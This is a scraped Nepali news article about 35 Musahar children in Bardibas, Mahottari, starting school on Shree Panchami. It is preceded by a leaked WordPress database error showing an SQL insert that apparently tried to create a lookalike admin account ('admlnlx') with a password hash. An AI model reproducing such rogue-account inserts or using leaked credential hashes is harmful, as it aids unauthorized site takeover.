WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4i.HQTGFWTukepdnCasjEv2N2KZk.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:38:11', '', 'admlnlx', 'admlnlx')
महोत्तरी, माघ १९ –
महोत्तरीको बर्दिबास–२ मुसहर बस्तीका ३५ जना बालबालिका श्रीपञ्चमीको अवसर पारेर एकैपटक विद्यालय जान थालेका छन् ।
मुसहर बस्तीमा नमुना एकीकृत बस्ती बनाइरहेका कलाकार सीताराम कट्टेल धुर्मुस र कुञ्जना घिमिरे सुन्तलीको प्रेरणा बस्तीका ३५ जना बालबालिकालाई अभिभावकले एकै साथ बुधबारदेखि अक्षराम्भ तथा पढाउन सुरु गरका हुन् । धुर्मुस सुन्तलीको प्रेरणाबाट मुसहरले पछिल्लो समय आफ्ना सन्तानलाई स्कुल पठाउन थालेको बस्तीका मञ्जय सादा मुसहरले बताउनुभयो ।
माघ शुक्ल पञ्चमीका दिन मनाइने ‘श्रीपञ्चमी’ पर्व बुधबार विद्याकी अधिष्ठात्री देवी सरस्वतीको प्रतिमा राखेर स्थानीयहरुले निष्ठापूर्वक पूजा–आराधना गरी छोराछोरीहरुलाई पढाउन सुरु गरेका हुन् । मुसहर बस्तीमा जिल्ला शिक्षा कार्यालयले बिहानी कक्षाको व्यवस्था गरेको छ ।